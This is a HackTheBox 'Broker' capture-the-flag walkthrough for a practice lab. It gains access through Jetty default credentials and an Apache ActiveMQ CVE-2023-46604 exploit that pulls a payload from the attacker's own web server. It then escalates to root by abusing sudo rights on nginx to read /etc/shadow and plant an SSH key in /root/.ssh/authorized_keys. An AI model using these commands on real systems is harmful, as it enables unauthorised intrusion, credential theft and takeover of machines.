HackTheBox – Broker Writeup / Walkthrough

Capture The Flag
featured

Information Gathering

Port Scan

nmap 10.10.11.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 19:30 WIB
Nmap scan report for 10.10.11.243
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds

Initial Access

web service running on 80 and we need the authorization credential for jetty. we can search the default credentials in google and we can use user:user for authorization

after authorized we will know that the website using Apache ActiveMQ.

we can exploit the Apache ActiveMQ using CVE-2023-46604

https://github.com/evkl1d/CVE-2023-46604

git clone https://github.com/evkl1d/CVE-2023-46604
cd CVE-2023-46604
python3 -m http.server -b 10.10.14.2 80 # run this in second terminal
python3 exploit.py -i 10.10.11.243 -u http://10.10.14.2/poc.xml

we need to modify payload inside poc.xml

Privilege Escalation

we can perform privilege escalation with exploiting /usr/sbin/nginx

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
..
User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
..

we need to create configuration files to create new web server with 1337 port, we can run this command

echo 'user root; events { worker_connections 1024; } http { server { listen 1337; root /; autoindex on; } }' > yha.conf
cat yha.conf # verify
sudo /usr/sbin/nginx -c /tmp/yha.conf &
curl localhost:1337/etc/shadow # reading /etc/shadow

it’s works! next, let’s try get the flag

we can also escalate to ssh via creating authorized_keys inside root directory, but we need create new nginx config to perform write

echo 'user root; events { worker_connections 1024; } http { server { listen 1338; root /; autoindex on; dav_methods PUT; } }' > /tmp/waduh.conf
sudo nginx -c /tmp/waduh.conf

next, we can write our public key to /root/.ssh/authorized_keys

ssh-keygen -t rsa
curl -X PUT "localhost:1338/root/.ssh/authorized_keys" -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAA...."
curl -s localhost:1337/root/.ssh/authorized_keys #verify

after authorized_keys has been created, we can try connect to ssh 

chmod 600 id_rsa
ssh [email protected] -i id_rsa
#oscp#pwkv3